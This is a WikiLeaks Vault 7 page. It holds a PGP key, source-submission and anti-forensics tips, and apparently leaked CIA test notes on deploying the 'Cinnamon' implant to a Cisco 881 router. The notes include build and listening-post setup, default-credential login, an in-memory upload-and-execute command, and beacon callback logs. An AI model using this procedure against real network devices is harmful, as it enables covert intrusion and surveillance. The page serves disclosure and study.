This key's fingerprint is A04C 5E09 ED02 B328 03EB 6116 93ED 732E 9231 8DBA

-----BEGIN PGP PUBLIC KEY BLOCK-----

mQQNBFUoCGgBIADFLp+QonWyK8L6SPsNrnhwgfCxCk6OUHRIHReAsgAUXegpfg0b
rsoHbeI5W9s5to/MUGwULHj59M6AvT+DS5rmrThgrND8Dt0dO+XW88bmTXHsFg9K
jgf1wUpTLq73iWnSBo1m1Z14BmvkROG6M7+vQneCXBFOyFZxWdUSQ15vdzjr4yPR
oMZjxCIFxe+QL+pNpkXd/St2b6UxiKB9HT9CXaezXrjbRgIzCeV6a5TFfcnhncpO
ve59rGK3/az7cmjd6cOFo1Iw0J63TGBxDmDTZ0H3ecQvwDnzQSbgepiqbx4VoNmH
OxpInVNv3AAluIJqN7RbPeWrkohh3EQ1j+lnYGMhBktX0gAyyYSrkAEKmaP6Kk4j
/ZNkniw5iqMBY+v/yKW4LCmtLfe32kYs5OdreUpSv5zWvgL9sZ+4962YNKtnaBK3
1hztlJ+xwhqalOCeUYgc0Clbkw+sgqFVnmw5lP4/fQNGxqCO7Tdy6pswmBZlOkmH
XXfti6hasVCjT1MhemI7KwOmz/KzZqRlzgg5ibCzftt2GBcV3a1+i357YB5/3wXE
j0vkd+SzFioqdq5Ppr+//IK3WX0jzWS3N5Lxw31q8fqfWZyKJPFbAvHlJ5ez7wKA
1iS9krDfnysv0BUHf8elizydmsrPWN944Flw1tOFjW46j4uAxSbRBp284wiFmV8N
TeQjBI8Ku8NtRDleriV3djATCg2SSNsDhNxSlOnPTM5U1bmh+Ehk8eHE3hgn9lRp
2kkpwafD9pXaqNWJMpD4Amk60L3N+yUrbFWERwncrk3DpGmdzge/tl/UBldPoOeK
p3shjXMdpSIqlwlB47Xdml3Cd8HkUz8r05xqJ4DutzT00ouP49W4jqjWU9bTuM48
LRhrOpjvp5uPu0aIyt4BZgpce5QGLwXONTRX+bsTyEFEN3EO6XLeLFJb2jhddj7O
DmluDPN9aj639E4vjGZ90Vpz4HpN7JULSzsnk+ZkEf2XnliRody3SwqyREjrEBui
9ktbd0hAeahKuwia0zHyo5+1BjXt3UHiM5fQN93GB0hkXaKUarZ99d7XciTzFtye
/MWToGTYJq9bM/qWAGO1RmYgNr+gSF/fQBzHeSbRN5tbJKz6oG4NuGCRJGB2aeXW
TIp/VdouS5I9jFLapzaQUvtdmpaeslIos7gY6TZxWO06Q7AaINgr+SBUvvrff/Nl
l2PRPYYye35MDs0b+mI5IXpjUuBC+s59gI6YlPqOHXkKFNbI3VxuYB0VJJIrGqIu
Fv2CXwy5HvR3eIOZ2jLAfsHmTEJhriPJ1sUG0qlfNOQGMIGw9jSiy/iQde1u3ZoF
so7sXlmBLck9zRMEWRJoI/mgCDEpWqLX7hTTABEBAAG0x1dpa2lMZWFrcyBFZGl0
b3JpYWwgT2ZmaWNlIEhpZ2ggU2VjdXJpdHkgQ29tbXVuaWNhdGlvbiBLZXkgKFlv
dSBjYW4gY29udGFjdCBXaWtpTGVha3MgYXQgaHR0cDovL3dsY2hhdGMzcGp3cGxp
NXIub25pb24gYW5kIGh0dHBzOi8vd2lraWxlYWtzLm9yZy90YWxrKSA8Y29udGFj
dC11cy11c2luZy1vdXItY2hhdC1zeXN0ZW1Ad2lraWxlYWtzLm9yZz6JBD0EEwEK
ACcCGwMFCwkIBwMFFQoJCAsFFgIDAQACHgECF4AFAlb6cdIFCQOznOoACgkQk+1z
LpIxjbrlqh/7B2yBrryWhQMGFj+xr9TIj32vgUIMohq94XYqAjOnYdEGhb5u5B5p
BNowcqdFB1SOEvX7MhxGAqYocMT7zz2AkG3kpf9f7gOAG7qA1sRiB+R7mZtUr9Kv
fQSsRFPb6RNzqqB9I9wPNGhBh1YWusUPluLINwbjTMnHXeL96HgdLT+fIBa8ROmn
0fjJVoWYHG8QtsKiZ+lo2m/J4HyuJanAYPgL6isSu/1bBSwhEIehlQIfXZuS3j35
12SsO1Zj2BBdgUIrADdMAMLneTs7oc1/PwxWYQ4OTdkay2deg1g/N6YqM2N7rn1W
7A6tmuH7dfMlhcqw8bf5veyag3RpKHGcm7utDB6k/bMBDMnKazUnM2VQoi1mutHj
kTCWn/vF1RVz3XbcPH94gbKxcuBi8cjXmSWNZxEBsbirj/CNmsM32Ikm+WIhBvi3
1mWvcArC3JSUon8RRXype4ESpwEQZd6zsrbhgH4UqF56pcFT2ubnqKu4wtgOECsw
K0dHyNEiOM1lL919wWDXH9tuQXWTzGsUznktw0cJbBVY1dGxVtGZJDPqEGatvmiR
o+UmLKWyxTScBm5o3zRm3iyU10d4gka0dxsSQMl1BRD3G6b+NvnBEsV/+KCjxqLU
vhDNup1AsJ1OhyqPydj5uyiWZCxlXWQPk4p5WWrGZdBDduxiZ2FTj17hu8S4a5A4
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
J3x7gtxUMkTadELqwY6hrU8=
=BLTH
-----END PGP PUBLIC KEY BLOCK-----
		

Contact

If you need help using Tor you can contact WikiLeaks for assistance in setting it up using our simple webchat available at: https://wikileaks.org/talk

If you can use Tor, but need to contact WikiLeaks for other reasons use our secured webchat available at http://wlchatc3pjwpli5r.onion

We recommend contacting us over Tor if you can.

Tor

Tor is an encrypted anonymising network that makes it harder to intercept internet communications, or see where communications are coming from or going to.

In order to use the WikiLeaks public submission system as detailed above you can download the Tor Browser Bundle, which is a Firefox-like browser available for Windows, Mac OS X and GNU/Linux and pre-configured to connect using the anonymising system Tor.

Tails

If you are at high risk and you have the capacity to do so, you can also access the submission system through a secure operating system called Tails. Tails is an operating system launched from a USB stick or a DVD that aim to leaves no traces when the computer is shut down after use and automatically routes your internet traffic through Tor. Tails will require you to have either a USB stick or a DVD at least 4GB big and a laptop or desktop computer.

Tips

Our submission system works hard to preserve your anonymity, but we recommend you also take some of your own precautions. Please review these basic guidelines.

1. Contact us if you have specific problems

If you have a very large submission, or a submission with a complex format, or are a high-risk source, please contact us. In our experience it is always possible to find a custom solution for even the most seemingly difficult situations.

2. What computer to use

If the computer you are uploading from could subsequently be audited in an investigation, consider using a computer that is not easily tied to you. Technical users can also use Tails to help ensure you do not leave any records of your submission on the computer.

3. Do not talk about your submission to others

If you have any issues talk to WikiLeaks. We are the global experts in source protection – it is a complex field. Even those who mean well often do not have the experience or expertise to advise properly. This includes other media organisations.

After

1. Do not talk about your submission to others

If you have any issues talk to WikiLeaks. We are the global experts in source protection – it is a complex field. Even those who mean well often do not have the experience or expertise to advise properly. This includes other media organisations.

2. Act normal

If you are a high-risk source, avoid saying anything or doing anything after submitting which might promote suspicion. In particular, you should try to stick to your normal routine and behaviour.

3. Remove traces of your submission

If you are a high-risk source and the computer you prepared your submission on, or uploaded it from, could subsequently be audited in an investigation, we recommend that you format and dispose of the computer hard drive and any other storage media you used.

In particular, hard drives retain data after formatting which may be visible to a digital forensics team and flash media (USB sticks, memory cards and SSD drives) retain data even after a secure erasure. If you used flash media to store sensitive data, it is important to destroy the media.

If you do this and are a high-risk source you should make sure there are no traces of the clean-up, since such traces themselves may draw suspicion.

4. If you face legal action

If a legal action is brought against you as a result of your submission, there are organisations that may help you. The Courage Foundation is an international organisation dedicated to the protection of journalistic sources. You can find more details at https://www.couragefound.org.

WikiLeaks publishes documents of political or historical importance that are censored or otherwise suppressed. We specialise in strategic global publishing and large archives.

The following is the address of our secure site where you can anonymously upload your documents to WikiLeaks editors. You can only access this submissions system through Tor. (See our Tor tab for more information.) We also advise you to read our tips for sources before submitting.

wlupld3ptjvsgwqw.onion
Copy this address into your Tor browser. Advanced users, if they wish, can also add a further layer of encryption to their submission using our public PGP key.

If you cannot use Tor, or your submission is very large, or you have specific requirements, WikiLeaks provides several alternative methods. Contact us to discuss how to proceed.

Vault7: CIA Hacking Tools Revealed

Navigation: » Latest version


Owner: User #71467

Cinnamon Cisco881 Testing

Cinnamon 881 Testing

The Bakery delivered Cinnamon for the Cisco881 on June 8.  Testing Cinnamon for use on an 881 for JQJSECONDCUT.  Operator has provided Target device configuration as well as some show commands from the Target.  This device is getting DHCPDynamic Host Configuration Protocol from an Internet provider, and is performing NATNetwork Address Translation and DHCPDynamic Host Configuration Protocol server role for inside hosts.  This device is also configured for DMVPN, presumably for VOIPVoice over Internet Protocol (Internet telephony) traffic.  CONOP will be to use at least two flux nodes, one outside the target network, and then exit and attack from a flux node on the inside LAN.

Testing Summary

  • Bacon RPM cannot be installed on ICON - Workaround - compiled bacon on the BuildVM and copied the bacon executable and bacon.cfg files to /opt/bacon on ICON.
  • IAC 2.4 does not work with DUTDevice Under Test configuration - transport input ssh.  IAC 2.4 requires a telnet connection.  Workaround - use IACInternational Access Code 4.1.
  • Spicerack error on CentOS 5.6 Blot LPListening Post VMVirtual Machine - /lib/libcrypto.so.0.9.8: no version information available (required by ./spice_rack)
  • Cinnamon implant has swindle.crt file size limitation

 

Progress/Notes

Cinnamon Setup Steps:

  • Build implant on BuildVM
    • Edit /impant/cinnamon.cfg
      • Edit LP_DOMAIN_NAME to match the dns entry for the Blot Proxy server - www.suptest.com in our test case
      • Edit Tool ID that will be used by beastbox/swindle to identify Cinnamon traffic - 0x9219D10C for our test case (this is arbitrary)
      • Edit PROBE_DEST entries so that they all say something that will resolve to web server - www.google.com in our test case
    • Create cmn-880-norb.bin file for No Reboot, non-persisten implant
      • make clean 880-norb - outputs a folder called 880-norb
    • Create modules needed for testing - from /implant/modules directory
      • make clean survey-powerpc
      • make clean redir-powerpc
  • Setup Blot 4.3 on CentOS 5.6 VMs
    • Beastbox and Swindle on Blot Proxy
      • Copy Blot 4.3 on to Blot Proxy VM
      • Install Beastbox and Swindle from rpms
      • Edit /etc/blot/beastbox.cfg
        • Edit external-ip to be the IP of the Blot Proxy server - 172.20.13.10 in our test case
        • Edit th name to spicerackH
        • Edit ip to Blot Spicerack server - 172.20.13.11 in our test case
        • Remove other th name entries
        • Edit server name Apache ip to the Cover Web server for 443 - 172.20.13.20 in our test case
        • Edit the server name Apache_2 ip to the Cover Web server for 80 - 172.20.13.20 in our test case 
        • Edit the server name BINDDNSDomain Name System server software ip to our DNSDomain Name System server for the test - X.X.X.X (LVLT-GOGL-8-8-8[US]) in our test case
        • Under itd swindle, edit tid num to Tool ID that has been baked into impant - 0x9219D10C in our test case
        • Under itd swindle, edit th to spicerackH
        • Remove other itd entries
      • Generate a certificate to match the DNSDomain Name System name for Blot Proxy and save to file in /etc/blot/itds/swindle/swindle.crt
        • openssl genrsa -out new_key.pem 1024
        • openssl req -new -key new_key.pem -out new_req.csr
        • openssl x509 -req -days 365 -in new_req.csr -signkey new_key.pem -out new_cert.crt
        • Note that CMNCaiman (Codename)? does not work with a larger key size - modulus 2048 does not work
        • File format for swindle.crt should be the output of 'openssl x509 -in new_cert.crt -noout -text' followed by new_cert.crt:

          Certificate:
          Data:
          Version: 1 (0x0)
          Serial Number:
          d8:2c:bd:b7:7d:47:4f:fc
          Signature Algorithm: sha1WithRSAEncryption
          Issuer: C=US, ST=CA, L=Home Town, O=Super T, OU=HR, CN=www.suptest.com/emailAddress=help@suptest.com
          Validity
          Not Before: Jun 16 13:05:52 2015 GMT
          Not After : Jun 15 13:05:52 2016 GMT
          Subject: C=US, ST=CA, L=Home Town, O=Super T, OU=HR, CN=www.suptest.com/emailAddress=help@suptest.co
          m
          Subject Public Key Info:
          Public Key Algorithm: rsaEncryption
          RSAEncryption algorithm Public Key: (1024 bit)
          Modulus (1024 bit):
          00:d8:2f:b2:59:62:b0:ee:a0:81:8e:38:04:6e:74:
          3d:dc:bf:41:99:b5:4c:d4:04:34:1c:83:21:1e:5a:
          23:11:ff:7f:a9:5c:51:92:c7:dc:4f:ba:0b:04:09:
          07:dd:b6:d6:a1:fa:97:01:34:8f:96:5e:cc:95:3c:
          b6:d1:61:8f:8a:a5:5b:ae:c4:05:b5:87:2a:30:4c:
          15:02:bb:95:dc:ba:98:bf:ab:d1:39:a0:d1:da:15:
          7d:95:48:1b:88:51:96:7c:f2:79:ff:a0:5d:d2:d8:
          87:a2:09:47:9c:f0:89:cc:98:57:d9:55:1c:c4:dd:
          80:c9:41:17:37:24:fc:89:7d
          Exponent: 65537 (0x10001)
          Signature Algorithm: sha1WithRSAEncryption
          0f:ed:5e:1a:61:98:f7:3a:8e:de:3d:6b:ee:5e:23:e7:24:30:
          d2:f1:e3:d5:ec:f4:3c:59:67:9c:e1:0a:25:dd:c4:5a:5b:f4:
          82:31:23:9f:ed:d9:fa:59:a2:d5:80:99:a1:1f:bc:19:90:29:
          77:16:29:18:25:38:03:a9:0d:54:dd:05:cb:f2:2a:ce:9a:e3:
          4d:c0:c1:e7:23:5c:c5:97:cf:94:85:a0:8d:1e:9a:f1:7d:6d:
          50:9e:e4:7f:a7:79:3e:8e:c4:a4:c3:51:28:a9:ac:31:dc:e1:
          4e:c1:d9:6f:08:99:96:02:ea:d4:79:f6:1e:de:cd:fa:a4:3d:
          b7:9d
          -----BEGIN CERTIFICATE-----
          MIICiTCCAfICCQDYLL23fUdP/DANBgkqhkiG9w0BAQUFADCBiDELMAkGA1UEBhMC
          VVMxCzAJBgNVBAgTAkNBMRIwEAYDVQQHEwlIb21lIFRvd24xEDAOBgNVBAoTB1N1
          cGVyIFQxCzAJBgNVBAsTAkhSMRgwFgYDVQQDEw93d3cuc3VwdGVzdC5jb20xHzAd
          BgkqhkiG9w0BCQEWEGhlbHBAc3VwdGVzdC5jb20wHhcNMTUwNjE2MTMwNTUyWhcN
          MTYwNjE1MTMwNTUyWjCBiDELMAkGA1UEBhMCVVMxCzAJBgNVBAgTAkNBMRIwEAYD
          VQQHEwlIb21lIFRvd24xEDAOBgNVBAoTB1N1cGVyIFQxCzAJBgNVBAsTAkhSMRgw
          FgYDVQQDEw93d3cuc3VwdGVzdC5jb20xHzAdBgkqhkiG9w0BCQEWEGhlbHBAc3Vw
          dGVzdC5jb20wgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBANgvsllisO6ggY44
          BG50Pdy/QZm1TNQENByDIR5aIxH/f6lcUZLH3E+6CwQJB9221qH6lwE0j5ZezJU8
          ttFhj4qlW67EBbWHKjBMFQK7ldy6mL+r0Tmg0doVfZVIG4hRlnzyef+gXdLYh6IJ
          R5zwicyYV9lVHMTdgMlBFzck/Il9AgMBAAEwDQYJKoZIhvcNAQEFBQADgYEAD+1e
          GmGY9zqO3j1r7l4j5yQw0vHj1ez0PFlnnOEKJd3EWlv0gjEjn+3Z+lmi1YCZoR+8
          GZApdxYpGCU4A6kNVN0Fy/IqzprjTcDB5yNcxZfPlIWgjR6a8X1tUJ7kf6d5Po7E
          pMNRKKmsMdzhTsHZbwiZlgLq1Hn2Ht7N+qQ9t50=
          -----END CERTIFICATE-----



      • Service beastbox start
      • Verify that Beastbox is working by web browsing to the Proxy IP and you should get forwarded to the Cover Web server for 80 and 443
    • Setup Blot LP
      • Copy spicerack, salt, pepper, and scramble rpms onto Blot LP
      • Install spicerack, salt, pepper and scramble from rpms
      • Run spicerack - /opt/spicerack/spice_rack 2>&1 >/dev/null & - libcrypto.so.0.9.8 error here
      • Disbabled iptables to get connection from impant to work - need to add rule to firewall instead of disabling
    • Copy Cinnamon network and redirect modules from BuildVM to /opt/pepper/cmds directory on LP
      • scp implant/modules/powerpc/redir-powerpc.module root@172.20.13.11:/opt/pepper/cmds/.
      • scp implant/modules/powerpc/survey-powerpc.module root@172.20.13.11:/opt/pepper/cmds/.
    • CoverWeb server - standard web server for 80 and 443 should be configured
  • Setup ICON VM
    • Copy bacon rpm to ICON VM
    • Install bacon from rpm - error here, had to compile bacon on the Build VMVirtual Machine and copy the executable and .cfg file to ICON /opt/bacon/
    • On Blot LP, use salt to calculate the Node ID
      • Copy first 0x80 bytes from Motherboard info in output if IOSApple operating system for small devices command "show diag" on the DUTDevice Under Test into a flie /opt/salt/cookie.txt
      • ./salt cookie.txt
    • Make a copy of /opt/bacon/bacon.cfg called 881-cfg
    • Edit the 881-cfg file
      • Change Node ID (called UNIQUE_ID in this file) calculated by salt - 0xfb583dbf for 881-Top
      • Change Toold ID - enter Tool ID that was used with beastbox/swindle - 0x9219D10C in our test case
    • Copy the 880-norb folder from BuildVM to ICON using windows share - error message: cp: cannot create symbolic link `/mnt/share/./880-norb/depack.c': Operation not supported
    • Copy the 880-norb folder from BuildVM to ICON using scp to avoid the above error
      • Must initiate SCP from ICON due to iptables - scp -r root@10.9.8.108:/home/cmn-build/cmn-5.0.0/implant/880-norb .
    • Copy IACInternational Access Code 4.1 to ICON - it includes remote
    • Setup remote
      • su - root
      • chmod -R +x data/config/npc3/profile
      • Edit data/config/npc3/target.py
        • interpacket time = 0.1
        • arch = 'ppc'
        • machine = '880'
      • Edit target-aliases with IP of target - XXX.XX.XXX.XXX (CABLEVISION[US]) in our test case
      • Copy ramUploadAndExecuteCmn800.py from utilities on BuildVM to ICON's NPC3CP-5.2/bin/remote/bin directory
  • Generate Seed traffic on the test network - watch -n2 wget -nv -T 1 -O /dev/null http://alias.google.com
  1. Smoke Test - Install CMN
    • Reload 881 router to start with clean setup
      • Sh proc cpu hist = 2% CPU without traffic load
      • Sh mem = Total-26214400 :: Used-9686440 :: Free-16527960
    • From Cinnabuild-5.0.0 VM:
      • /home/cmn-build/cmn-5.0/implant# make clean 880-norb   (script completes and creates 880-norb directory)
    • From Cinnamon-ICON:
      • /home/user1# scp -r root@10.9.8.108:/home/cmn-build/cmn-5.0/implant/880-norb/ .
        • Enter password and directory copies over
      • /home/user1/IAC 4.1.0/delivery/IAC-4.1.0/bin# ./sshiac-ppc -i XXX.XX.XXX.XXX (CABLEVISION[US]) -l cisco:cisco

        • 881 cpu spikes to 99% two different times for about 20 seconds each
        • LGDHM codes given and ssh-iac is complete
      • /home/user1/IAC 4.1.0/delivery/NPC3CP-5.2/bin/remote# vim target-aliases
        • Configure target IP and procid
        • #source aliases = remote>
        • #broad
        • #./seq set 1
        • #broad = status OK
        • [target:XXX.XX.XXX.XXX (CABLEVISION[US])] remote> ./bin/ramUploadAndExecuteCmn800.py /home/user1/880-norb/cmn-880-norb.bin

        • "yes"
        • file chunks uploaded and reach 100%
        • Wait 3 minutes minimum
          • sh proc cpu hist: spikes to 11-12% for five seconds about once a minute and then settles in to 4-6% repeatidly
          • sh mem = Total-26214400 :: Used-9686440 :: Free-16527960
  2. Smoke Test - Establish Comms
    • [root@blot-spicerack log]# tail -f spicerack.log

    • user1@Cinnamon-ICON:/opt/bacon$ sudo ./bacon XXX.XX.XXX.XXX (CABLEVISION[US]) 881.cfg www.suptest.com 443

      • Spicerack log shows callback from implant
        • 06/16/2015 13:10:19.065 - Mission2:0:Debug: Socket accept info: client address = 172.20.13.10, port = 32991
          06/16/2015 13:10:19.071 - Mission2:11:Info : SESSION STARTED
          06/16/2015 13:10:19.071 - Mission2:11:Debug: Connected To: IP address = 172.20.13.10, port = 32991.
          06/16/2015 13:10:19.916 - Mission2:11:Debug: +++Packet received (12 bytes).+++
          06/16/2015 13:10:19.916 - Mission2:11:Debug: +++Packet received (780 bytes).+++
          06/16/2015 13:10:19.916 - Mission2:11:Info : +++Message received (792 bytes).+++
          06/16/2015 13:10:19.916 - Mission2:11:Debug: Time packet received = 06/16/2015 13:10:19.916.
          06/16/2015 13:10:19.916 - Mission2:11:Debug: Data Length = 708
          06/16/2015 13:10:19.917 - Mission2:11:Debug: Tool ID Xor = 3
          06/16/2015 13:10:19.917 - Mission2:11:Info : Tool ID = 0x9219d10c
          06/16/2015 13:10:19.917 - Mission2:11:Debug: Seed = 0x33fb3f95
          06/16/2015 13:10:19.917 - Mission2:11:Debug: Hash = 0x3536
          06/16/2015 13:10:19.917 - Mission2:11:Info : Node ID = 0xfb583dbf
          06/16/2015 13:10:19.917 - Mission2:11:Debug: Timestamp = 0x000014a4
          06/16/2015 13:10:19.917 - Mission2:11:Debug: Module ID = 1
          06/16/2015 13:10:19.917 - Mission2:11:Debug: Last Packet Indicator = 1
          06/16/2015 13:10:19.932 - Mission2:11:Debug: Payload data length from encrypted header = 692.
          06/16/2015 13:10:19.932 - Mission2:11:Debug: Payload data type = 0, data length = 686, data end = 1.
          06/16/2015 13:10:19.932 - Mission2:11:Debug: COMMS-H request mission module name = Beacon, ID = 1.
          06/16/2015 13:10:19.932 - Mission2:11:Info : +++BTHP REQUEST PACKET 1 RECEIVED - Beacon+++
          06/16/2015 13:10:19.932 - Mission2:0:Info : dumpRawPacket: For RCVD_RAW_FILE
          06/16/2015 13:10:19.935 - Mission2:11:Info : Dumped raw packet received to file: /opt/spicerack/data/fb583dbf/Beacon/receive/20150616131019_0000000011.raw.
          06/16/2015 13:10:19.935 - Mission2:11:Debug: Payload data type = 0, data length = 686, data end = 1.
          06/16/2015 13:10:19.938 - Mission2:11:Debug: Writing to receive file /opt/spicerack/data/fb583dbf/Beacon/receive/20150616131019_0000000011.rcvd.
          06/16/2015 13:10:19.938 - Mission2:11:Info : Dumped BTHP request string received to file: /opt/spicerack/data/fb583dbf/Beacon/receive/20150616131019_0000000011.rcvd.
          06/16/2015 13:10:19.938 - Mission2:11:Info : ---Building COMMS-H signal response(s)---
          06/16/2015 13:10:19.938 - Mission2:11:Debug: Parsing .send file for commands.
          06/16/2015 13:10:19.939 - Mission2:11:Debug: No commands present. Sending No Op
          06/16/2015 13:10:19.939 - Mission2:11:Debug: Total COMMS-H payload length of command(s) reply data = 15
          06/16/2015 13:10:19.939 - Mission2:11:Debug: Single packet response, payloadLength = 77, payloadDataLength = 15, lastPacketIndicator = 1
          06/16/2015 13:10:19.939 - Mission2:11:Debug: Inserting Tool ID = 0x9219d10c, Tool ID Xor Key Index = 3
          06/16/2015 13:10:19.939 - Mission2:11:Debug: Seed = 0x91a54cfe
          06/16/2015 13:10:19.939 - Mission2:11:Debug: COMMS-H response auth hash = 0xac54.
          06/16/2015 13:10:19.939 - Mission2:11:Debug: Returning built 1 COMMS-H reply packet(s).
          06/16/2015 13:10:19.939 - Mission2:11:Debug: BTHP reply payload data length = 77.
          06/16/2015 13:10:19.939 - Mission2:11:Debug: hdr_len = 24, data_len = 77.
          06/16/2015 13:10:19.939 - Mission2:11:Debug: Before response write, replySize = 101.
          06/16/2015 13:10:19.939 - Mission2:11:Debug: ---Packet sent (101/101 bytes).---
          06/16/2015 13:10:19.939 - Mission2:11:Info : ---Message sent (101 bytes).---
          06/16/2015 13:10:19.939 - Mission2:11:Debug: Time response sent = 06/16/2015 13:10:19.939.
          06/16/2015 13:10:19.939 - Mission2:11:Info : ---COMMS-H REPLY SENT (1/1) - ---
          06/16/2015 13:10:19.942 - Mission2:11:Info : Dumped raw packet sent to file: /opt/spicerack/data/fb583dbf/Beacon/sent/20150616131019_0000000011.raw.
          06/16/2015 13:10:19.945 - Mission2:11:Debug: Writing to sent file /opt/spicerack/data/fb583dbf/Beacon/sent/20150616131019_0000000011.sent.
          06/16/2015 13:10:20.916 - Mission2:11:Debug: CLOSING SOCKET 5
          06/16/201 5 13:10:20.916 - Mission2:11:Debug: Shutdown connection: IP address = 172.20.13.10, port = 32991.
          06/16/2015 13:10:20.917 - Mission2:11:Info : SESSION ENDED

